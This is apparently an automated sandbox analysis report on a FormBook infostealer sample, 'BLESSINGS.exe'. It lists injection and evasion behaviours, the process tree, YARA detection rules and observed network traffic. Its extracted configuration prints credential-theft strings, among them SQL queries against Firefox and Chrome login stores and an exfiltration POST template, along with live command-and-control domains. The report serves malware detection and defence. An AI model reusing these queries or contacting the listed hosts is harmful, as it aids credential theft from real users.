Loading ...

Play interactive tourEdit tour

Analysis Report BLESSINGS.exe

Overview

General Information

Sample Name:BLESSINGS.exe
Analysis ID:339345
MD5:30cb872994e8a0a4a635b06bfbe38006
SHA1:02e502ef79ea251f04fa9e02dd1d7639e59c7ddc
SHA256:d0b62e121a89ba8e44b4b71a887dd80df1e4fc746dabc200854622e9ed1fa8cb
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • BLESSINGS.exe (PID: 4588 cmdline: 'C:\Users\user\Desktop\BLESSINGS.exe' MD5: 30CB872994E8A0A4A635B06BFBE38006)
    • AddInProcess32.exe (PID: 6264 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6744 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6784 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com", "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online", "definity.finance", "weddingmustgoon.com", "ludisenofloral.com", "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com", "internetmarkaching.com", "solidconstruct.site", "ip-freight.com", "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net", "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com", "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com", "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site", "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com", "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com", "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store", "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com", "mywillandmylife.com", "novergi.com", "eaglesnestpropheticministry.com", "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com", "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com", "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com", "kathymusic.com", "quintred.com", "mad54.art", "simplification.business", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.registeredagentfirm.com/jqc/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      8.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        8.2.AddInProcess32.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        8.2.AddInProcess32.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        8.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          8.2.AddInProcess32.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 8.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for submitted fileShow sources
          Source: BLESSINGS.exeVirustotal: Detection: 45%Perma Link
          Source: BLESSINGS.exeReversingLabs: Detection: 15%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: BLESSINGS.exeJoe Sandbox ML: detected
          Source: 8.2.AddInProcess32.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: BLESSINGS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: BLESSINGS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\BLESSINGS.exeCode function: 4x nop then jmp 0117F696h1_2_0117EEC2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi8_2_00416BF3
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi8_2_00416C07
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi8_2_00416C27
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi8_2_00416C3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 4x nop then pop edi8_2_00417D68
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi15_2_001E6BF3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi15_2_001E6C07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi15_2_001E6C3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi15_2_001E6C27
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi15_2_001E7D68
          Source: global trafficHTTP traffic detected: GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1Host: www.quintred.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 91.195.241.137 91.195.241.137
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: global trafficHTTP traffic detected: GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1Host: www.quintred.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.toweroflifeinc.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: BLESSINGS.exe, 00000001.00000003.420634051.00000000014F8000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.com/jqc/www.sterlworldshop.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.11sxsx.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.com/jqc/:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.asacal.comReferer:
          Source: explorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.com/jqc/www.margosbest.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.cositasdepachecos.comReferer:
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.com/jqc/www.kornteengoods.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.droriginals.comReferer:
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
